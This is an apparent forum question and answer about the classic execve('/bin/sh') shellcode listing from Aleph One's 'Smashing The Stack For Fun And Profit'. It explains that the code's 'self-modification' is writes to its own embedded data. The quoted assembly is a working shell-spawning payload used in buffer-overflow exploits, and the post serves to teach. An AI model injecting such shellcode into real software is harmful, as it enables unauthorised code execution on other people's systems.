Where Aleph one's shell code is changing itself?

Question

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:

    jmp    0x2a                     # 2 bytes
    popl   %esi                     # 1 byte
    movl   %esi,0x8(%esi)           # 3 bytes
    movb   $0x0,0x7(%esi)           # 4 bytes
    movl   $0x0,0xc(%esi)           # 7 bytes
    movl   $0xb,%eax                # 5 bytes
    movl   %esi,%ebx                # 2 bytes
    leal   0x8(%esi),%ecx           # 3 bytes
    leal   0xc(%esi),%edx           # 3 bytes
    int    $0x80                    # 2 bytes
    movl   $0x1, %eax               # 5 bytes
    movl   $0x0, %ebx               # 5 bytes
    int    $0x80                    # 2 bytes
    call   -0x2f                    # 5 bytes
    .string \"/bin/sh\"             # 8 bytes
------------------------------------------------------------------------------

Looks good. To make sure it works correctly we must compile it and run it.
**But there is a problem.  Our code modifies itself**, but most operating system
mark code pages read-only.

My question is where (and how) does this code modifies itself? [I don't know assembly that well]

Thanks!

Answer 1

The first instruction jumps to the call at the end of the code which calls back to the second instruction that pops the return address placed on the stack by the call. Thus esi points to the string at the end. As you can see, the next 3 instructions write to memory relative to esi, setting up the argument pointer and zero terminating the string and the argument list. This is what the self modification refers to. It's slightly misleading because it isn't modifying code, just data. During standalone testing that data is part of the .text section which is typically read only, but can be made writable easily. Note that during actual usage this would be in the stack which is writable, but not executable so you'd have a different problem then.